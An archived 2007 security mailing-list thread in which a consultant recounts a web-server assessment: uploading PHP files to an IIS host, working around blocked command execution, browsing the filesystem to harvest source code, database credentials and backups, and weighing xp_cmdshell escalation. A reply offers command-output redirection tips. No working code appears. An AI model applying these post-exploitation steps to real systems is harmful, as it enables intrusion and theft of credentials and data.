From: Danux (danuxx@gmail.com)
Date: Tue Nov 27 2007 - 13:35:26 EST
Hi all, as i told you, i am not able to run system, exec, passthru,
etc, i mean, all related to cmd.exe execution because of IIS
IUSR_MACHINE User privileges.
I have finished the assessment and i would like to share what i did at
the final:
As i told you, i was able to upload files directly to the windows
filesystem due to another vulnerability, but i cant execute any
command related to cmd.exe: dir, ipconfig, type, net, etc, etc, but i
do can execute php files, then i upload a list.php script in order to
walkthrough the filesystem, then, i was able to download all the app
php site and after looking inside the source code, i found some MSSQL
users and passwords with low privileges, and in other filesystem
directories i found log files, conf files, backups, etc, i mean very
interesting information to deal with.
Maybe, i could start trying to elevate privileges on MSSQL in order
to execute xp_cmdshell or something like that, but i think i have what
really matters to attackers...and what should matter to Companies...
"INFORMATION".
Thanks all for your help.
On Nov 27, 2007 7:07 AM, Robin Wood <dninja@gmail.com> wrote:
> On 23/11/2007, Danux <danuxx@gmail.com> wrote:
> > Hi experts, i need your ideas,
> >
> > By now, i am able to upload php files to a Windows 2003 Server, so i
> > can execute php code like phpinfo, but i cant execute passthru command
> > because of lack of IUSR_MACHINE privileges.
> > I have run some local php bof's without success.
>
> Have you tried other ways to execute commands such as system or exec?
> If you can get one of those working you can redirect output to a file
> in the document root then view it by browsing to it.
>
> Robin
>
-- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:13 EDT